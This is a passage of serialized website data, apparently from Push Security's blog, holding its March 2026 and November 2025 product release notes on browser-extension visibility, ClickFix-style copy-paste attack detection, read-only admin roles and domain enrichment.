,"marks":17914,"data":17916},[17915],{"type":370},{},{"nodeType":173,"value":8717,"marks":17918,"data":17919},[],{},{"nodeType":173,"value":8721,"marks":17921,"data":17923},[17922],{"type":370},{},{"nodeType":173,"value":8726,"marks":17925,"data":17926},[],{},{"nodeType":173,"value":8730,"marks":17928,"data":17930},[17929],{"type":370},{},{"nodeType":173,"value":8735,"marks":17932,"data":17933},[],{},{"nodeType":312,"data":17935,"content":17938},{"target":17936},{"sys":17937},{"id":8742,"type":317,"linkType":318},[],{"nodeType":231,"data":17940,"content":17941},{},[],{"nodeType":169,"data":17943,"content":17944},{},[17945],{"nodeType":173,"value":8751,"marks":17946,"data":17948},[17947],{"type":370},{},{"nodeType":235,"data":17950,"content":17951},{},[17952],{"nodeType":173,"value":8759,"marks":17953,"data":17955},[17954],{"type":370},{},{"nodeType":178,"data":17957,"content":17958},{},[17959],{"nodeType":173,"value":8767,"marks":17960,"data":17961},[],{},{"nodeType":178,"data":17963,"content":17964},{},[17965,17968,17975],{"nodeType":173,"value":37,"marks":17966,"data":17967},[],{},{"nodeType":186,"data":17969,"content":17970},{"uri":5002},[17971],{"nodeType":173,"value":8780,"marks":17972,"data":17974},[17973],{"type":194},{},{"nodeType":173,"value":8785,"marks":17976,"data":17977},[],{},{"nodeType":178,"data":17979,"content":17980},{},[17981],{"nodeType":173,"value":8792,"marks":17982,"data":17983},[],{},{"nodeType":312,"data":17985,"content":17988},{"target":17986},{"sys":17987},{"id":685,"type":317,"linkType":318},[],{"nodeType":312,"data":17990,"content":17993},{"target":17991},{"sys":17992},{"id":8804,"type":317,"linkType":318},[],{"nodeType":178,"data":17995,"content":17996},{},[17997],{"nodeType":173,"value":8810,"marks":17998,"data":17999},[],{},{"nodeType":178,"data":18001,"content":18002},{},[18003],{"nodeType":173,"value":8817,"marks":18004,"data":18005},[],{},{"nodeType":235,"data":18007,"content":18008},{},[18009],{"nodeType":173,"value":8824,"marks":18010,"data":18012},[18011],{"type":370},{},{"nodeType":178,"data":18014,"content":18015},{},[18016],{"nodeType":173,"value":8832,"marks":18017,"data":18018},[],{},{"nodeType":178,"data":18020,"content":18021},{},[18022],{"nodeType":173,"value":8839,"marks":18023,"data":18024},[],{},{"nodeType":312,"data":18026,"content":18029},{"target":18027},{"sys":18028},{"id":8846,"type":317,"linkType":318},[],{"nodeType":178,"data":18031,"content":18032},{},[18033],{"nodeType":173,"value":8852,"marks":18034,"data":18035},[],{},{"nodeType":178,"data":18037,"content":18038},{},[18039,18042,18049],{"nodeType":173,"value":8859,"marks":18040,"data":18041},[],{},{"nodeType":186,"data":18043,"content":18044},{"uri":8864},[18045],{"nodeType":173,"value":8867,"marks":18046,"data":18048},[18047],{"type":194},{},{"nodeType":173,"value":8872,"marks":18050,"data":18051},[],{},{"nodeType":235,"data":18053,"content":18054},{},[18055],{"nodeType":173,"value":8879,"marks":18056,"data":18058},[18057],{"type":370},{},{"nodeType":178,"data":18060,"content":18061},{},[18062],{"nodeType":173,"value":8887,"marks":18063,"data":18064},[],{},{"nodeType":178,"data":18066,"content":18067},{},[18068],{"nodeType":173,"value":8894,"marks":18069,"data":18070},[],{},{"nodeType":178,"data":18072,"content":18073},{},[18074,18077,18084],{"nodeType":173,"value":8901,"marks":18075,"data":18076},[],{},{"nodeType":186,"data":18078,"content":18079},{"uri":8906},[18080],{"nodeType":173,"value":8909,"marks":18081,"data":18083},[18082],{"type":194},{},{"nodeType":173,"value":8914,"marks":18085,"data":18086},[],{},{"nodeType":312,"data":18088,"content":18091},{"target":18089},{"sys":18090},{"id":8921,"type":317,"linkType":318},[],{"nodeType":178,"data":18093,"content":18094},{},[18095,18098,18105],{"nodeType":173,"value":8927,"marks":18096,"data":18097},[],{},{"nodeType":186,"data":18099,"content":18100},{"uri":4342},[18101],{"nodeType":173,"value":4519,"marks":18102,"data":18104},[18103],{"type":194},{},{"nodeType":173,"value":8938,"marks":18106,"data":18107},[],{},{"nodeType":312,"data":18109,"content":18112},{"target":18110},{"sys":18111},{"id":8945,"type":317,"linkType":318},[],{"nodeType":178,"data":18114,"content":18115},{},[18116],{"nodeType":173,"value":8951,"marks":18117,"data":18118},[],{},{"nodeType":312,"data":18120,"content":18123},{"target":18121},{"sys":18122},{"id":8958,"type":317,"linkType":318},[],{"nodeType":231,"data":18125,"content":18126},{},[],{"nodeType":169,"data":18128,"content":18129},{},[18130],{"nodeType":173,"value":8967,"marks":18131,"data":18133},[18132],{"type":370},{},{"nodeType":178,"data":18135,"content":18136},{},[18137],{"nodeType":173,"value":8975,"marks":18138,"data":18139},[],{},{"nodeType":178,"data":18141,"content":18142},{},[18143,18146,18153],{"nodeType":173,"value":8982,"marks":18144,"data":18145},[],{},{"nodeType":186,"data":18147,"content":18148},{"uri":8987},[18149],{"nodeType":173,"value":8157,"marks":18150,"data":18152},[18151],{"type":194},{},{"nodeType":173,"value":8994,"marks":18154,"data":18155},[],{},{"nodeType":178,"data":18157,"content":18158},{},[18159],{"nodeType":173,"value":9001,"marks":18160,"data":18161},[],{},{"nodeType":178,"data":18163,"content":18164},{},[18165,18168,18172,18175,18182],{"nodeType":173,"value":9008,"marks":18166,"data":18167},[],{},{"nodeType":173,"value":9012,"marks":18169,"data":18171},[18170],{"type":370},{},{"nodeType":173,"value":2936,"marks":18173,"data":18174},[],{},{"nodeType":186,"data":18176,"content":18177},{"uri":9021},[18178],{"nodeType":173,"value":9024,"marks":18179,"data":18181},[18180],{"type":194},{},{"nodeType":173,"value":9029,"marks":18183,"data":18184},[],{},{"nodeType":178,"data":18186,"content":18187},{},[18188],{"nodeType":173,"value":9036,"marks":18189,"data":18190},[],{},{"nodeType":178,"data":18192,"content":18193},{},[18194],{"nodeType":173,"value":9043,"marks":18195,"data":18197},[18196],{"type":370},{},{"nodeType":231,"data":18199,"content":18200},{},[],{"nodeType":169,"data":18202,"content":18203},{},[18204],{"nodeType":173,"value":9054,"marks":18205,"data":18207},[18206],{"type":370},{},{"nodeType":178,"data":18209,"content":18210},{},[18211],{"nodeType":173,"value":9062,"marks":18212,"data":18213},[],{},{"nodeType":178,"data":18215,"content":18216},{},[18217],{"nodeType":173,"value":9069,"marks":18218,"data":18219},[],{},{"nodeType":312,"data":18221,"content":18224},{"target":18222},{"sys":18223},{"id":9076,"type":317,"linkType":318},[],{"nodeType":178,"data":18226,"content":18227},{},[18228],{"nodeType":173,"value":9082,"marks":18229,"data":18230},[],{},{"nodeType":250,"data":18232,"content":18233},{},[18234,18252],{"nodeType":254,"data":18235,"content":18236},{},[18237],{"nodeType":178,"data":18238,"content":18239},{},[18240,18243,18249],{"nodeType":173,"value":37,"marks":18241,"data":18242},[],{},{"nodeType":186,"data":18244,"content":18245},{"uri":9099},[18246],{"nodeType":173,"value":9102,"marks":18247,"data":18248},[],{},{"nodeType":173,"value":9106,"marks":18250,"data":18251},[],{},{"nodeType":254,"data":18253,"content":18254},{},[18255],{"nodeType":178,"data":18256,"content":18257},{},[18258,18261,18267],{"nodeType":173,"value":37,"marks":18259,"data":18260},[],{},{"nodeType":186,"data":18262,"content":18263},{"uri":9120},[18264],{"nodeType":173,"value":9123,"marks":18265,"data":18266},[],{},{"nodeType":173,"value":9127,"marks":18268,"data":18269},[],{},{"nodeType":312,"data":18271,"content":18274},{"target":18272},{"sys":18273},{"id":9134,"type":317,"linkType":318},[],{"nodeType":178,"data":18276,"content":18277},{},[18278],{"nodeType":173,"value":9140,"marks":18279,"data":18280},[],{},{"nodeType":178,"data":18282,"content":18283},{},[18284,18287,18294,18297,18304],{"nodeType":173,"value":9147,"marks":18285,"data":18286},[],{},{"nodeType":186,"data":18288,"content":18289},{"uri":9152},[18290],{"nodeType":173,"value":9155,"marks":18291,"data":18293},[18292],{"type":194},{},{"nodeType":173,"value":9160,"marks":18295,"data":18296},[],{},{"nodeType":186,"data":18298,"content":18299},{"uri":1034},[18300],{"nodeType":173,"value":9167,"marks":18301,"data":18303},[18302],{"type":194},{},{"nodeType":173,"value":9172,"marks":18305,"data":18306},[],{},{"nodeType":312,"data":18308,"content":18311},{"target":18309},{"sys":18310},{"id":9179,"type":317,"linkType":318},[],{"nodeType":3769,"data":18313,"content":18314},{},[18315],{"nodeType":178,"data":18316,"content":18317},{},[18318,18321,18328,18331,18337,18340,18347],{"nodeType":173,"value":3925,"marks":18319,"data":18320},[],{},{"nodeType":186,"data":18322,"content":18323},{"uri":1456},[18324],{"nodeType":173,"value":3932,"marks":18325,"data":18327},[18326],{"type":194},{},{"nodeType":173,"value":2936,"marks":18329,"data":18330},[],{},{"nodeType":186,"data":18332,"content":18333},{"uri":3941},[18334],{"nodeType":173,"value":3944,"marks":18335,"data":18336},[],{},{"nodeType":173,"value":3949,"marks":18338,"data":18339},[],{},{"nodeType":186,"data":18341,"content":18342},{"uri":1469},[18343],{"nodeType":173,"value":1472,"marks":18344,"data":18346},[18345],{"type":194},{},{"nodeType":173,"value":1477,"marks":18348,"data":18349},[],{},{"nodeType":178,"data":18351,"content":18352},{},[18353],{"nodeType":173,"value":37,"marks":18354,"data":18355},[],{},{"items":18357},[18358,18360],{"sys":18359,"name":505},{"id":504},{"sys":18361,"name":509},{"id":508},{"items":18363},[18364],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":18365},{"url":1496},{"items":18367},[18368],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":18369},{"url":1496},"content:blog:stryker-handala-report.json","blog/stryker-handala-report.json","blog/stryker-handala-report",{"_path":18374,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":18375,"ogImage":118,"summary":18378,"title":18389,"subtitle":118,"metaTitle":18390,"synopsis":18391,"hashTags":118,"publishedDate":18392,"slug":18393,"tagsCollection":18394,"relatedBlogPostsCollection":18400,"authorsCollection":19130,"content":19134,"_id":19670,"_type":5439,"_source":5440,"_file":19671,"_stem":19672,"_extension":5439},"/blog/product-release-march-2026",{"id":18376,"publishedAt":18377},"3Yw48rVLntipUijLR0CYf2","2026-03-10T20:32:25.404Z",{"json":18379},{"data":18380,"content":18381,"nodeType":165},{},[18382],{"data":18383,"content":18384,"nodeType":178},{},[18385],{"data":18386,"marks":18387,"value":18388,"nodeType":173},{},[],"Malicious extension detection, block ClickFix-style attacks, custom branding and more","Product release: March 2026","Push Security new product features for March 2026","Here’s what’s new on the Push platform for March 2026.","2026-03-10T00:00:00.000Z","product-release-march-2026",{"items":18395},[18396],{"sys":18397,"name":18399},{"id":18398},"5jk0kqjSdSK2L0YiistQjY","Release notes",{"items":18401},[18402],{"__typename":1528,"sys":18403,"content":18405,"title":19114,"synopsis":19115,"hashTags":118,"publishedDate":19116,"slug":19117,"tagsCollection":19118,"authorsCollection":19122},{"id":18404},"3ygDMHnTN58Lyb3W3k969w",{"json":18406},{"data":18407,"content":18408,"nodeType":165},{},[18409,18416,18489,18495,18502,18527,18552,18585,18591,18609,18615,18622,18629,18662,18668,18686,18692,18708,18715,18739,18746,18753,18776,18792,18798,18804,18811,18827,18834,18887,18894,18900,18918,18924,18939,18946,18969,18991,18997,19004,19108],{"data":18410,"content":18411,"nodeType":169},{},[18412],{"data":18413,"marks":18414,"value":18415,"nodeType":173},{},[],"What's new this month:",{"data":18417,"content":18418,"nodeType":250},{},[18419,18429,18439,18449,18459,18469,18479],{"data":18420,"content":18421,"nodeType":254},{},[18422],{"data":18423,"content":18424,"nodeType":178},{},[18425],{"data":18426,"marks":18427,"value":18428,"nodeType":173},{},[],"Get visibility for all installed browser extensions in your environment",{"data":18430,"content":18431,"nodeType":254},{},[18432],{"data":18433,"content":18434,"nodeType":178},{},[18435],{"data":18436,"marks":18437,"value":18438,"nodeType":173},{},[],"New detection for ClickFix-style malicious copy-paste attacks",{"data":18440,"content":18441,"nodeType":254},{},[18442],{"data":18443,"content":18444,"nodeType":178},{},[18445],{"data":18446,"marks":18447,"value":18448,"nodeType":173},{},[],"New Labs feature: Experimental detections",{"data":18450,"content":18451,"nodeType":254},{},[18452],{"data":18453,"content":18454,"nodeType":178},{},[18455],{"data":18456,"marks":18457,"value":18458,"nodeType":173},{},[],"RBAC for the Push admin console",{"data":18460,"content":18461,"nodeType":254},{},[18462],{"data":18463,"content":18464,"nodeType":178},{},[18465],{"data":18466,"marks":18467,"value":18468,"nodeType":173},{},[],"URLscan.io and domain registration enrichment for detections",{"data":18470,"content":18471,"nodeType":254},{},[18472],{"data":18473,"content":18474,"nodeType":178},{},[18475],{"data":18476,"marks":18477,"value":18478,"nodeType":173},{},[],"Filter events by entities",{"data":18480,"content":18481,"nodeType":254},{},[18482],{"data":18483,"content":18484,"nodeType":178},{},[18485],{"data":18486,"marks":18487,"value":18488,"nodeType":173},{},[],"And a few other things … ",{"data":18490,"content":18491,"nodeType":169},{},[18492],{"data":18493,"marks":18494,"value":18428,"nodeType":173},{},[],{"data":18496,"content":18497,"nodeType":178},{},[18498],{"data":18499,"marks":18500,"value":18501,"nodeType":173},{},[],"You can now use Push to see other browser extensions installed on your employees’ browsers.",{"data":18503,"content":18504,"nodeType":178},{},[18505,18509,18514,18518,18523],{"data":18506,"marks":18507,"value":18508,"nodeType":173},{},[],"You can enable this feature by going to ",{"data":18510,"marks":18511,"value":18513,"nodeType":173},{},[18512],{"type":370},"Settings > Organization",{"data":18515,"marks":18516,"value":18517,"nodeType":173},{},[]," in the Push admin console and toggling on ",{"data":18519,"marks":18520,"value":18522,"nodeType":173},{},[18521],{"type":370},"Browser extension visibility",{"data":18524,"marks":18525,"value":18526,"nodeType":173},{},[],". There is no end-user impact when you enable this feature.",{"data":18528,"content":18529,"nodeType":178},{},[18530,18534,18539,18543,18548],{"data":18531,"marks":18532,"value":18533,"nodeType":173},{},[],"You’ll see browser extension data populate a new ",{"data":18535,"marks":18536,"value":18538,"nodeType":173},{},[18537],{"type":370},"Browser extensions",{"data":18540,"marks":18541,"value":18542,"nodeType":173},{},[]," page in the admin console under ",{"data":18544,"marks":18545,"value":18547,"nodeType":173},{},[18546],{"type":370},"Investigate",{"data":18549,"marks":18550,"value":18551,"nodeType":173},{},[],". With this information, you can see:",{"data":18553,"content":18554,"nodeType":250},{},[18555,18565,18575],{"data":18556,"content":18557,"nodeType":254},{},[18558],{"data":18559,"content":18560,"nodeType":178},{},[18561],{"data":18562,"marks":18563,"value":18564,"nodeType":173},{},[],"Which extensions have been installed for each employee and browser.",{"data":18566,"content":18567,"nodeType":254},{},[18568],{"data":18569,"content":18570,"nodeType":178},{},[18571],{"data":18572,"marks":18573,"value":18574,"nodeType":173},{},[],"How they were installed (e.g. by policy, manually, or sideloaded).",{"data":18576,"content":18577,"nodeType":254},{},[18578],{"data":18579,"content":18580,"nodeType":178},{},[18581],{"data":18582,"marks":18583,"value":18584,"nodeType":173},{},[],"Which permissions they have.",{"data":18586,"content":18590,"nodeType":312},{"target":18587},{"sys":18588},{"id":18589,"type":317,"linkType":318},"5J5jdmwugy7yU8GGwxe7iH",[],{"data":18592,"content":18593,"nodeType":178},{},[18594,18597,18606],{"data":18595,"marks":18596,"value":37,"nodeType":173},{},[],{"data":18598,"content":18601,"nodeType":1698},{"target":18599},{"sys":18600},{"id":2489,"type":317,"linkType":318},[18602],{"data":18603,"marks":18604,"value":18605,"nodeType":173},{},[],"Learn more",{"data":18607,"marks":18608,"value":37,"nodeType":173},{},[],{"data":18610,"content":18611,"nodeType":169},{},[18612],{"data":18613,"marks":18614,"value":18438,"nodeType":173},{},[],{"data":18616,"content":18617,"nodeType":178},{},[18618],{"data":18619,"marks":18620,"value":18621,"nodeType":173},{},[],"Push can now detect malicious copy and paste attacks like ClickFix, FileFix, and other fake CAPTCHA-style techniques.",{"data":18623,"content":18624,"nodeType":178},{},[18625],{"data":18626,"marks":18627,"value":18628,"nodeType":173},{},[],"These techniques have become one of the most prevalent attack types this year, and rely on deceiving users into manually or automatically copying malicious code and running it locally.",{"data":18630,"content":18631,"nodeType":178},{},[18632,18636,18641,18645,18650,18654,18658],{"data":18633,"marks":18634,"value":18635,"nodeType":173},{},[],"You can enable ",{"data":18637,"marks":18638,"value":18640,"nodeType":173},{},[18639],{"type":370},"Malicious copy and paste detection",{"data":18642,"marks":18643,"value":18644,"nodeType":173},{},[]," from the ",{"data":18646,"marks":18647,"value":18649,"nodeType":173},{},[18648],{"type":370},"Controls",{"data":18651,"marks":18652,"value":18653,"nodeType":173},{},[]," page of the Push admin console. Add a configuration rule to set the detection to ",{"data":18655,"marks":18656,"value":2701,"nodeType":173},{},[18657],{"type":370},{"data":18659,"marks":18660,"value":18661,"nodeType":173},{},[],". You can also add an exception for any staff who routinely handle malicious scripts, such as security team members, or add domains to the ignore list as needed.",{"data":18663,"content":18667,"nodeType":312},{"target":18664},{"sys":18665},{"id":18666,"type":317,"linkType":318},"2fPaiwRCAUd8lMvsVO03HZ",[],{"data":18669,"content":18670,"nodeType":178},{},[18671,18674,18683],{"data":18672,"marks":18673,"value":37,"nodeType":173},{},[],{"data":18675,"content":18679,"nodeType":1698},{"target":18676},{"sys":18677},{"id":18678,"type":317,"linkType":318},"1u8RJxC00HbBhCBVxcDnkK",[18680],{"data":18681,"marks":18682,"value":18605,"nodeType":173},{},[],{"data":18684,"marks":18685,"value":37,"nodeType":173},{},[],{"data":18687,"content":18688,"nodeType":169},{},[18689],{"data":18690,"marks":18691,"value":18448,"nodeType":173},{},[],{"data":18693,"content":18694,"nodeType":178},{},[18695,18699,18704],{"data":18696,"marks":18697,"value":18698,"nodeType":173},{},[],"Get early access to new detections from the Push research team by enabling ",{"data":18700,"marks":18701,"value":18703,"nodeType":173},{},[18702],{"type":370},"Experimental detections",{"data":18705,"marks":18706,"value":18707,"nodeType":173},{},[],", a Labs feature.",{"data":18709,"content":18710,"nodeType":178},{},[18711],{"data":18712,"marks":18713,"value":18714,"nodeType":173},{},[],"Labs features are new features Push is testing before releasing them. Early access detections are designed to catch emerging attacker techniques, but may also produce more false positives while we finetune them. These early access detections do not block any user actions.",{"data":18716,"content":18717,"nodeType":178},{},[18718,18722,18726,18730,18735],{"data":18719,"marks":18720,"value":18721,"nodeType":173},{},[],"Enable ",{"data":18723,"marks":18724,"value":18703,"nodeType":173},{},[18725],{"type":370},{"data":18727,"marks":18728,"value":18729,"nodeType":173},{},[]," by going to ",{"data":18731,"marks":18732,"value":18734,"nodeType":173},{},[18733],{"type":370},"Settings > Labs",{"data":18736,"marks":18737,"value":18738,"nodeType":173},{},[]," in the admin console.",{"data":18740,"content":18741,"nodeType":169},{},[18742],{"data":18743,"marks":18744,"value":18745,"nodeType":173},{},[],"RBAC for the Push platform",{"data":18747,"content":18748,"nodeType":178},{},[18749],{"data":18750,"marks":18751,"value":18752,"nodeType":173},{},[],"You can now provide read-only access to the Push admin console to facilitate investigations, review detections, check app usage by department, help with employee offboarding — or anything else you need.",{"data":18754,"content":18755,"nodeType":178},{},[18756,18760,18764,18768,18773],{"data":18757,"marks":18758,"value":18759,"nodeType":173},{},[],"To add a read-only admin, go to ",{"data":18761,"marks":18762,"value":18513,"nodeType":173},{},[18763],{"type":370},{"data":18765,"marks":18766,"value":18767,"nodeType":173},{},[]," in the admin console. Enter the email address of the admin you want to invite and set the role to ",{"data":18769,"marks":18770,"value":18772,"nodeType":173},{},[18771],{"type":370},"Read only",{"data":18774,"marks":18775,"value":1477,"nodeType":173},{},[],{"data":18777,"content":18778,"nodeType":178},{},[18779,18783,18788],{"data":18780,"marks":18781,"value":18782,"nodeType":173},{},[],"Note that existing Push admins now have the role of ",{"data":18784,"marks":18785,"value":18787,"nodeType":173},{},[18786],{"type":370},"Full access",{"data":18789,"marks":18790,"value":18791,"nodeType":173},{},[],". You can adjust that role as needed from the Organization page, too.",{"data":18793,"content":18797,"nodeType":312},{"target":18794},{"sys":18795},{"id":18796,"type":317,"linkType":318},"7kraCfSP2YwdEEwZ8FxM1t",[],{"data":18799,"content":18800,"nodeType":169},{},[18801],{"data":18802,"marks":18803,"value":18468,"nodeType":173},{},[],{"data":18805,"content":18806,"nodeType":178},{},[18807],{"data":18808,"marks":18809,"value":18810,"nodeType":173},{},[],"You can now enrich detections in Push with information from urlscan.io, and see when the domain was first registered. This information gives you domain-relevant context to support investigations.",{"data":18812,"content":18813,"nodeType":178},{},[18814,18818,18823],{"data":18815,"marks":18816,"value":18817,"nodeType":173},{},[],"To enable this feature, go to ",{"data":18819,"marks":18820,"value":18822,"nodeType":173},{},[18821],{"type":370},"Settings > Advanced > Domain enrichment",{"data":18824,"marks":18825,"value":18826,"nodeType":173},{},[]," in the Push admin console or enable it from any existing detection event.",{"data":18828,"content":18829,"nodeType":178},{},[18830],{"data":18831,"marks":18832,"value":18833,"nodeType":173},{},[],"With this enrichment, you can quickly see:",{"data":18835,"content":18836,"nodeType":250},{},[18837,18847,18857,18867,18877],{"data":18838,"content":18839,"nodeType":254},{},[18840],{"data":18841,"content":18842,"nodeType":178},{},[18843],{"data":18844,"marks":18845,"value":18846,"nodeType":173},{},[],"The timestamp for when a domain was first registered",{"data":18848,"content":18849,"nodeType":254},{},[18850],{"data":18851,"content":18852,"nodeType":178},{},[18853],{"data":18854,"marks":18855,"value":18856,"nodeType":173},{},[],"The number of times a domain was scanned on urlscan",{"data":18858,"content":18859,"nodeType":254},{},[18860],{"data":18861,"content":18862,"nodeType":178},{},[18863],{"data":18864,"marks":18865,"value":18866,"nodeType":173},{},[],"The first time a domain was scanned",{"data":18868,"content":18869,"nodeType":254},{},[18870],{"data":18871,"content":18872,"nodeType":178},{},[18873],{"data":18874,"marks":18875,"value":18876,"nodeType":173},{},[],"The last time a domain or IP was scanned",{"data":18878,"content":18879,"nodeType":254},{},[18880],{"data":18881,"content":18882,"nodeType":178},{},[18883],{"data":18884,"marks":18885,"value":18886,"nodeType":173},{},[],"A urlscan verdict (e.g. “potentially malicious”)",{"data":18888,"content":18889,"nodeType":178},{},[18890],{"data":18891,"marks":18892,"value":18893,"nodeType":173},{},[],"You’ll see the enrichment data on the details slideout for an individual detection.",{"data":18895,"content":18899,"nodeType":312},{"target":18896},{"sys":18897},{"id":18898,"type":317,"linkType":318},"563fJFSgoLDOwSXSQ9Y0MM",[],{"data":18901,"content":18902,"nodeType":178},{},[18903,18906,18915],{"data":18904,"marks":18905,"value":37,"nodeType":173},{},[],{"data":18907,"content":18911,"nodeType":1698},{"target":18908},{"sys":18909},{"id":18910,"type":317,"linkType":318},"19qsIXEG6EN9EK0VRH3pw9",[18912],{"data":18913,"marks":18914,"value":18605,"nodeType":173},{},[],{"data":18916,"marks":18917,"value":37,"nodeType":173},{},[],{"data":18919,"content":18920,"nodeType":169},{},[18921],{"data":18922,"marks":18923,"value":18478,"nodeType":173},{},[],{"data":18925,"content":18926,"nodeType":178},{},[18927,18931,18935],{"data":18928,"marks":18929,"value":18930,"nodeType":173},{},[],"You can now filter the ",{"data":18932,"marks":18933,"value":2718,"nodeType":173},{},[18934],{"type":370},{"data":18936,"marks":18937,"value":18938,"nodeType":173},{},[]," page in the Push admin console by entities such as employees and apps to make triage more efficient.",{"data":18940,"content":18941,"nodeType":178},{},[18942],{"data":18943,"marks":18944,"value":18945,"nodeType":173},{},[],"With this option, you can do quick searches such as:",{"data":18947,"content":18948,"nodeType":250},{},[18949,18959],{"data":18950,"content":18951,"nodeType":254},{},[18952],{"data":18953,"content":18954,"nodeType":178},{},[18955],{"data":18956,"marks":18957,"value":18958,"nodeType":173},{},[],"See all recent events associated with an employee",{"data":18960,"content":18961,"nodeType":254},{},[18962],{"data":18963,"content":18964,"nodeType":178},{},[18965],{"data":18966,"marks":18967,"value":18968,"nodeType":173},{},[],"See all recent logins for a given app",{"data":18970,"content":18971,"nodeType":178},{},[18972,18975,18979,18983,18988],{"data":18973,"marks":18974,"value":2785,"nodeType":173},{},[],{"data":18976,"marks":18977,"value":2718,"nodeType":173},{},[18978],{"type":370},{"data":18980,"marks":18981,"value":18982,"nodeType":173},{},[]," page, go to ",{"data":18984,"marks":18985,"value":18987,"nodeType":173},{},[18986],{"type":370},"Filters > Entity type",{"data":18989,"marks":18990,"value":1477,"nodeType":173},{},[],{"data":18992,"content":18993,"nodeType":169},{},[18994],{"data":18995,"marks":18996,"value":18488,"nodeType":173},{},[],{"data":18998,"content":18999,"nodeType":178},{},[19000],{"data":19001,"marks":19002,"value":19003,"nodeType":173},{},[],"Other new features or improvements to the platform include:",{"data":19005,"content":19006,"nodeType":250},{},[19007,19044,19066,19076,19098],{"data":19008,"content":19009,"nodeType":254},{},[19010],{"data":19011,"content":19012,"nodeType":178},{},[19013,19017,19027,19030,19040],{"data":19014,"marks":19015,"value":19016,"nodeType":173},{},[],"You can now configure exceptions for ",{"data":19018,"content":19022,"nodeType":1698},{"target":19019},{"sys":19020},{"id":19021,"type":317,"linkType":318},"4oOTN6FXPpZg9MLgQUujys",[19023],{"data":19024,"marks":19025,"value":19026,"nodeType":173},{},[],"MFA findings",{"data":19028,"marks":19029,"value":933,"nodeType":173},{},[],{"data":19031,"content":19035,"nodeType":1698},{"target":19032},{"sys":19033},{"id":19034,"type":317,"linkType":318},"2eOzRGosD2Ghaipao7NY8W",[19036],{"data":19037,"marks":19038,"value":19039,"nodeType":173},{},[],"reused password",{"data":19041,"marks":19042,"value":19043,"nodeType":173},{},[]," findings. This is useful if you purposefully reuse passwords between systems or enforce MFA through a third-party provider.",{"data":19045,"content":19046,"nodeType":254},{},[19047],{"data":19048,"content":19049,"nodeType":178},{},[19050,19054,19063],{"data":19051,"marks":19052,"value":19053,"nodeType":173},{},[],"We’ve added several first-class SIEM integrations. ",{"data":19055,"content":19059,"nodeType":1698},{"target":19056},{"sys":19057},{"id":19058,"type":317,"linkType":318},"2M73i6A90S9MY6Pe8uVjVv",[19060],{"data":19061,"marks":19062,"value":18605,"nodeType":173},{},[],{"data":19064,"marks":19065,"value":1477,"nodeType":173},{},[],{"data":19067,"content":19068,"nodeType":254},{},[19069],{"data":19070,"content":19071,"nodeType":178},{},[19072],{"data":19073,"marks":19074,"value":19075,"nodeType":173},{},[],"We’ve expanded the limit for URLs you can block using the URL blocking control to 2,000.",{"data":19077,"content":19078,"nodeType":254},{},[19079],{"data":19080,"content":19081,"nodeType":178},{},[19082,19086,19095],{"data":19083,"marks":19084,"value":19085,"nodeType":173},{},[],"You can now set a time period after which to automatically un-license inactive employees, to make license management easier. ",{"data":19087,"content":19091,"nodeType":1698},{"target":19088},{"sys":19089},{"id":19090,"type":317,"linkType":318},"6Ad43w7Cjz2L5fZN2klIOn",[19092],{"data":19093,"marks":19094,"value":18605,"nodeType":173},{},[],{"data":19096,"marks":19097,"value":1477,"nodeType":173},{},[],{"data":19099,"content":19100,"nodeType":254},{},[19101],{"data":19102,"content":19103,"nodeType":178},{},[19104],{"data":19105,"marks":19106,"value":19107,"nodeType":173},{},[],"Push now supports Prisma Access browser.\n",{"data":19109,"content":19110,"nodeType":178},{},[19111],{"data":19112,"marks":19113,"value":37,"nodeType":173},{},[],"Product release: November 2025","Here’s what’s new on the Push platform for November 2025.","2025-11-04T00:00:00.000Z","product-release-november-2025",{"items":19119},[19120],{"sys":19121,"name":18399},{"id":18398},{"items":19123},[19124],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":19128},"Andy Waugh","Andy","VP Product",{"url":19129},"https://images.ctfassets.net/y1cdw1ablpvd/3Rf76rJn6S9inMb4dUnAIJ/0a787f8141d05b95300e2fe77c4493fa/DSC_6868.jpg",{"items":19131},[19132],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":19133},{"url":19129},{"json":19135,"links":19623},{"data":19136,"content":19137,"nodeType":165},{},[19138,19144,19206,19213,19220,19236,19251,19257,19274,19280,19295,19302,19308,19325,19331,19351,19384,19401,19407,19414,19429,19435,19453,19459,19466,19489,19513,19531,19538,19544,19617],{"data":19139,"content":19140,"nodeType":169},{},[19141],{"data":19142,"marks":19143,"value":18415,"nodeType":173},{},[],{"data":19145,"content":19146,"nodeType":250},{},[19147,19157,19167,19177,19187,19197],{"data":19148,"content":19149,"nodeType":254},{},[19150],{"data":19151,"content":19152,"nodeType":178},{},[19153],{"data":19154,"marks":19155,"value":19156,"nodeType":173},{},[],"Detect malicious browser extensions",{"data":19158,"content":19159,"nodeType":254},{},[19160],{"data":19161,"content":19162,"nodeType":178},{},[19163],{"data":19164,"marks":19165,"value":19166,"nodeType":173},{},[],"Create a blocklist or allowlist for browser extensions",{"data":19168,"content":19169,"nodeType":254},{},[19170],{"data":19171,"content":19172,"nodeType":178},{},[19173],{"data":19174,"marks":19175,"value":19176,"nodeType":173},{},[],"Block ClickFix-style attacks and collect payloads for investigation",{"data":19178,"content":19179,"nodeType":254},{},[19180],{"data":19181,"content":19182,"nodeType":178},{},[19183],{"data":19184,"marks":19185,"value":19186,"nodeType":173},{},[],"Custom branding for employee-facing banners and block pages",{"data":19188,"content":19189,"nodeType":254},{},[19190],{"data":19191,"content":19192,"nodeType":178},{},[19193],{"data":19194,"marks":19195,"value":19196,"nodeType":173},{},[],"Collect additional metadata to support threat detection",{"data":19198,"content":19199,"nodeType":254},{},[19200],{"data":19201,"content":19202,"nodeType":178},{},[19203],{"data":19204,"marks":19205,"value":18488,"nodeType":173},{},[],{"data":19207,"content":19208,"nodeType":169},{},[19209],{"data":19210,"marks":19211,"value":19212,"nodeType":173},{},[],"Detect malicious extensions",{"data":19214,"content":19215,"nodeType":178},{},[19216],{"data":19217,"marks":19218,"value":19219,"nodeType":173},{},[],"Push can now detect and block malicious browser extensions found in your environment. ",{"data":19221,"content":19222,"nodeType":178},{},[19223,19227,19232],{"data":19224,"marks":19225,"value":19226,"nodeType":173},{},[],"Push maintains a global list of malicious extensions based on our own threat research and publicly available threat intelligence. When an extension in your environment matches a malicious extension ID, Push will raise a detection on the 